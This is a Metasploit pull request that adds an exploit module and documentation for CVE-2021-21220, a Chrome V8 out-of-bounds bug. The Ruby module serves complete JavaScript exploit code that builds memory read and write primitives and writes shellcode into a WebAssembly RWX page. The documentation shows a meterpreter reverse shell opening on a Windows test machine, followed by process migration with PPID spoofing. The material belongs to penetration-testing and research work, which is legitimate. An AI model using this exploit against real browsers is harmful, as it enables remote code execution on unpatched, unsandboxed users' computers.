### PR TITLE
Create Module for CVE-2021-21220 - Chrome V8 XOR Typer Mismatch Out-Of-Bounds Access Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
+++ b/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
@@ -4,7 +4,7 @@ This module exploits CVE-2021-21220 an out of bounds access issue in Google Chro
 89.0.4389.128/90.0.4430.72 (64 bit) that was reported as part of Pwn2Own 2021 by Bruno Keith and
 Niklas Baumstark of Dataflow Security.
 
-The exploit makes takes advantage of a lack of proper input validation in the V8 engine on x86_x64 builds
+The exploit takes advantage of a lack of proper input validation in the V8 engine on x86_x64 builds
 of Chrome when handling XOR operations within JIT compiled code. Successful exploitation leads to RCE execution
 within the context of the V8 renderer.
 
@@ -21,7 +21,7 @@ You can download a vulnerable Chrome version from this location:
 
 ## Verification Steps
 
-1. Do: `use exploit/multi/browser/chrome_simplifiedlowering_overflow`
+1. Do: `use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation`
 2. Do: `set URIPATH / [PATH]`
 3. Do: `set LHOST [IP]`
 4. Do: `set SRVHOST [IP]`

--- a/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
+++ b/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 This module exploits CVE-2021-21220 an out of bounds access issue in Google Chrome versions before
-89.0.4389.128/90.0.4430.72 (64 bit) that was reported as part of Pwn2Own 2020 by Bruno Keith and
+89.0.4389.128/90.0.4430.72 (64 bit) that was reported as part of Pwn2Own 2021 by Bruno Keith and
 Niklas Baumstark of Dataflow Security.
 
 The exploit makes takes advantage of a lack of proper input validation in the V8 engine on x86_x64 builds

--- a/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
+++ b/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+
+This module exploits CVE-2021-21220 an out of bounds access issue in Google Chrome versions before
+89.0.4389.128/90.0.4430.72 (64 bit) that was reported as part of Pwn2Own 2020 by Bruno Keith and
+Niklas Baumstark of Dataflow Security.
+
+The exploit makes takes advantage of a lack of proper input validation in the V8 engine on x86_x64 builds
+of Chrome when handling XOR operations within JIT compiled code. Successful exploitation leads to RCE execution
+within the context of the V8 renderer.
+
+Note that as the V8 renderer is sandboxed within typical Chrome setups, the browser must be run without a sandbox by using
+the --no-sandbox option for the payload to work correctly.
+
+The module is compatible with any 64bit Google Chrome (versions before 87.0.4280.88) on multiple platforms.
+However, the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://chromium.cypress.io/win64/beta/90.0.4430.70](https://chromium.cypress.io/win64/beta/90.0.4430.70)
+
+## Verification Steps
+
+1. Do: `use exploit/multi/browser/chrome_simplifiedlowering_overflow`
+2. Do: `set URIPATH / [PATH]`
+3. Do: `set LHOST [IP]`
+4. Do: `set SRVHOST [IP]`
+5. Do: `exploit`
+
+## Options
+None
+
+## Scenarios
+
+### Windows 10 and Google Chrome 90.0.4430.0 with --no-sandbox
+
+Start Google Chrome without a sandbox, e.g:
+`"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox`
+
+```
+msf6 > use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set TARGET 1
+TARGET => 1
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > show options
+
+Module options (exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
+                                       hine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.17.233.206   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)
+
+
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
+[*] Started reverse TCP handler on 172.17.233.206:4444
+[*] Using URL: http://0.0.0.0:8080/F6htJoKY5li
+[*] Local IP: http://172.17.233.206:8080/F6htJoKY5li
+[*] Server started.
+[*] 172.17.236.178   chrome_cve_2021_21220_v8_insufficient_validation - Sending /F6htJoKY5li to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
+[*] Sending stage (200262 bytes) to 172.17.236.178
+[*] Meterpreter session 1 opened (172.17.233.206:4444 -> 172.17.236.178:65165) at 2021-04-27 13:19:35 -0500
+
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-KUO5CML\test
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > use post/windows/migrate
+[-] No results from search
+[-] Failed to load module: post/windows/migrate
+msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > use post/windows/manage/migrate
+msf6 post(windows/manage/migrate) > show options
+
+Module options (post/windows/manage/migrate):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   KILL       false            no        Kill original process for the session.
+   NAME                        no        Name of process to migrate to.
+   PID        0                no        PID of process to migrate to.
+   PPID       0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+                                         .
+   PPID_NAME                   no        Name of process for PPID spoofing when creating a new process.
+   SESSION                     yes       The session to run this module on.
+   SPAWN      true             no        Spawn process to migrate to. If set, notepad.exe is used.
+
+msf6 post(windows/manage/migrate) > set SESSION 1
+SESSION => 1
+msf6 post(windows/manage/migrate) > run
+
+[*] Running module against DESKTOP-KUO5CML
+[*] Current server process: chrome.exe (10116)
+[*] Spawning notepad.exe process to migrate into
+[*] Spoofing PPID 0
+[*] Migrating into 8732
+[+] Successfully migrated into process 8732
+[*] Post module execution completed
+msf6 post(windows/manage/migrate) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getpid
+Current pid: 8732
+meterpreter > getuid
+Server username: DESKTOP-KUO5CML\test
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > sysinfo
+Computer        : DESKTOP-KUO5CML
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
+++ b/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
@@ -106,9 +106,6 @@ SeUndockPrivilege
 
 meterpreter > background
 [*] Backgrounding session 1...
-msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > use post/windows/migrate
-[-] No results from search
-[-] Failed to load module: post/windows/migrate
 msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > use post/windows/manage/migrate
 msf6 post(windows/manage/migrate) > show options
 

--- a/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
+++ b/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
@@ -76,14 +76,14 @@ class MetasploitModule < Msf::Exploit::Remote
       var dataview = new DataView(shellbuf);
 
       function ftoi(val) {
-          f64_buf[0] = val;
-          return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+        f64_buf[0] = val;
+        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
       }
 
       function itof(val) {
-          u64_buf[0] = Number(val & 0xffffffffn);
-          u64_buf[1] = Number(val >> 32n);
-          return f64_buf[0];
+        u64_buf[0] = Number(val & 0xffffffffn);
+        u64_buf[1] = Number(val >> 32n);
+        return f64_buf[0];
       }
 
       const _arr = new Uint32Array([2**31]);
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
 
       for(var i=0;i<0x3000;++i)
-          foo();
+        foo();
 
       var x = foo();
       var arr = x[0];
@@ -119,42 +119,42 @@ class MetasploitModule < Msf::Exploit::Remote
       if (cor.length == 3) location.reload();
 
       function addrof(k) {
-          arr[idx+1] = k;
-          return ftoi(cor[0]) & 0xffffffffn;
+        arr[idx+1] = k;
+        return ftoi(cor[0]) & 0xffffffffn;
       }
 
       function fakeobj(k) {
-          cor[0] = itof(k);
-          return arr[idx+1];
+        cor[0] = itof(k);
+        return arr[idx+1];
       }
 
       var arr2 = [cor[3], 1.2, 2.3, 3.4];
       var fake = fakeobj(addrof(arr2) + 0x20n);
 
       function arbread(addr) {
-          if (addr % 2n == 0) {
-              addr += 1n;
-          }
-          arr2[1] = itof((2n << 32n) + addr - 8n);
-          return (fake[0]);
+        if (addr % 2n == 0) {
+          addr += 1n;
+        }
+        arr2[1] = itof((2n << 32n) + addr - 8n);
+        return (fake[0]);
       }
 
       function arbwrite(addr, val) {
-          if (addr % 2n == 0) {
-              addr += 1n;
-          }
-          arr2[1] = itof((2n << 32n) + addr - 8n);
-          fake[0] = itof(BigInt(val));
+        if (addr % 2n == 0) {
+          addr += 1n;
+        }
+        arr2[1] = itof((2n << 32n) + addr - 8n);
+        fake[0] = itof(BigInt(val));
       }
 
       function copy_shellcode(addr, shellcode) {
-          let buf_addr = addrof(shellbuf);
-          let backing_store_addr = buf_addr + 0x14n;
-          arbwrite(backing_store_addr, addr);
+        let buf_addr = addrof(shellbuf);
+        let backing_store_addr = buf_addr + 0x14n;
+        arbwrite(backing_store_addr, addr);
 
-          for (let i = 0; i < shellcode.length; i++) {
-            dataview.setUint8(i, shellcode[i]);
-          }
+        for (let i = 0; i < shellcode.length; i++) {
+          dataview.setUint8(i, shellcode[i]);
+        }
       }
 
       var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));

--- a/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
+++ b/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
@@ -116,6 +116,8 @@ class MetasploitModule < Msf::Exploit::Remote
       const idx = 6;
       arr[idx+10] = 0x4242;
 
+      if (cor.length == 3) location.reload();
+
       function addrof(k) {
           arr[idx+1] = k;
           return ftoi(cor[0]) & 0xffffffffn;

--- a/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
+++ b/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
@@ -1,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE',
+        'Description' => %q{
+          This module exploits an issue in the V8 engine on x86_x64 builds of Google Chrome before 89.0.4389.128/90.0.4430.72
+          when handling XOR operations in JIT'd JavaScript code. Successful exploitation allows an attacker to execute
+          arbitrary code within the context of the V8 process.
+
+          As the V8 process is normally sandboxed in the default configuration of Google Chrome, the browser must be run with the
+          --no-sandbox option for the payload to work correctly.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Bruno Keith (bkth_)', # Vulnerability Discovery
+          'Niklas Baumstark (_niklasb)', # Vulnerabilty Discovery
+          'Rajvardhan Agarwal (r4j0x00)', # exploit
+          'Grant Willcox (tekwizz123)' # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-21220'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-0day'],
+          ['URL', 'https://twitter.com/r4j0x00/status/1382125720344793090'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1196683'], # Restricted at the time of writing, but should be public at some point.
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/']
+        ],
+        'Arch' => [ ARCH_X64 ],
+        'DefaultTarget' => 0,
+        'Payload' =>
+        {
+          'Space' => 4096
+        },
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Targets' =>
+          [
+            ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],
+            ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],
+            ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],
+          ],
+        'DisclosureDate' => '2021-04-13'
+      )
+    )
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
+    jscript = <<~JS
+      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+      var wasm_mod = new WebAssembly.Module(wasm_code);
+      var wasm_instance = new WebAssembly.Instance(wasm_mod);
+      var f = wasm_instance.exports.main;
+
+      var buf = new ArrayBuffer(8);
+      var f64_buf = new Float64Array(buf);
+      var u64_buf = new Uint32Array(buf);
+
+      var shellcode = new Uint8Array([#{shellcode}]);
+      var shellbuf = new ArrayBuffer(shellcode.length);
+      var dataview = new DataView(shellbuf);
+
+      function ftoi(val) {
+          f64_buf[0] = val;
+          return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+      }
+
+      function itof(val) {
+          u64_buf[0] = Number(val & 0xffffffffn);
+          u64_buf[1] = Number(val >> 32n);
+          return f64_buf[0];
+      }
+
+      const _arr = new Uint32Array([2**31]);
+
+      function foo(a) {
+          var x = 1;
+        x = (_arr[0] ^ 0) + 1;
+
+        x = Math.abs(x);
+        x -= 2147483647;
+        x = Math.max(x, 0);
+
+        x -= 1;
+        if(x==-1) x = 0;
+
+        var arr = new Array(x);
+        arr.shift();
+        var cor = [1.1, 1.2, 1.3];
+
+        return [arr, cor];
+      }
+
+      for(var i=0;i<0x3000;++i)
+          foo(true);
+
+      var x = foo(false);
+      var arr = x[0];
+      var cor = x[1];
+
+      const idx = 6;
+      arr[idx+10] = 0x4242;
+
+      function addrof(k) {
+          arr[idx+1] = k;
+          return ftoi(cor[0]) & 0xffffffffn;
+      }
+
+      function fakeobj(k) {
+          cor[0] = itof(k);
+          return arr[idx+1];
+      }
+
+      var float_array_map = ftoi(cor[3]);
+
+      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+      var fake = fakeobj(addrof(arr2) + 0x20n);
+
+      function arbread(addr) {
+          if (addr % 2n == 0) {
+              addr += 1n;
+          }
+          arr2[1] = itof((2n << 32n) + addr - 8n);
+          return (fake[0]);
+      }
+
+      function arbwrite(addr, val) {
+          if (addr % 2n == 0) {
+              addr += 1n;
+          }
+          arr2[1] = itof((2n << 32n) + addr - 8n);
+          fake[0] = itof(BigInt(val));
+      }
+
+      function copy_shellcode(addr, shellcode) {
+          let buf_addr = addrof(shellbuf);
+          let backing_store_addr = buf_addr + 0x14n;
+          arbwrite(backing_store_addr, addr);
+
+          for (let i = 0; i < shellcode.length; i++) {
+            dataview.setUint8(i, shellcode[i]);
+          }
+      }
+
+      var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+      copy_shellcode(rwx_page_addr, shellcode);
+      f();
+    JS
+
+    html = <<~HTML
+      <html>
+      <head>
+      <script>
+      #{jscript}
+      </script>
+      </head>
+      <body>
+      </body>
+      </html>
+    HTML
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
+  end
+
+end

--- a/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
+++ b/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
       var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
       var wasm_mod = new WebAssembly.Module(wasm_code);
       var wasm_instance = new WebAssembly.Instance(wasm_mod);
-      var f = wasm_instance.exports.main;
+      var wasm_main_func = wasm_instance.exports.main;
 
       var buf = new ArrayBuffer(8);
       var f64_buf = new Float64Array(buf);
@@ -88,12 +88,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
       const _arr = new Uint32Array([2**31]);
 
-      function foo(a) {
-          var x = 1;
+      function foo() {
+        var x = 1;
         x = (_arr[0] ^ 0) + 1;
 
         x = Math.abs(x);
-        x -= 2147483647;
+        x -= 0x7FFFFFFF;
         x = Math.max(x, 0);
 
         x -= 1;
@@ -107,9 +107,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }
 
       for(var i=0;i<0x3000;++i)
-          foo(true);
+          foo();
 
-      var x = foo(false);
+      var x = foo();
       var arr = x[0];
       var cor = x[1];
 
@@ -126,9 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
           return arr[idx+1];
       }
 
-      var float_array_map = ftoi(cor[3]);
-
-      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+      var arr2 = [cor[3], 1.2, 2.3, 3.4];
       var fake = fakeobj(addrof(arr2) + 0x20n);
 
       function arbread(addr) {
@@ -159,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
       copy_shellcode(rwx_page_addr, shellcode);
-      f();
+      wasm_main_func();
     JS
 
     html = <<~HTML


### PR DESCRIPTION
This adds in an exploit module for CVE-2021-21220, a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@_niklasb) and Bruno Keith (@bkth_).

This module is based entirely off of the PoC from @r4j0x00 that he posted online at https://github.com/r4j0x00/exploits/tree/master/chrome-0day. I simply ported over the work using one of the previous modules that he submitted to Metasploit and made a few minor adjustments to the JavaScript code to get things working.

Note that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape. Feel free to submit a PR if you do happen to combine this with a sandbox escape and would like to update this module though!

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation`
- [ ] `set TARGET *target number from list, with 0 being Linux, 1 being Windows, and 2 being MacOS*`
- [ ] `set PAYLOAD *payload you would like to run*`
- [ ] `set LHOST` and `set RHOST` as needed, plus any additional payload specific options.
- [ ] `exploit`
- [ ] On the target, run the vulnerable Chrome version without the sandbox by using the `--no-sandbox` flag on the command line. This might look something like `C:\Users\test\AppData\Local\Chromium\Application\chrome.exe --no-sandbox`.
- [ ] The output of running `exploit` should have provided a link for where to browse to trigger the exploit. Load this up in Chrome.
- [ ] Confirm that you get a shell on the target system.
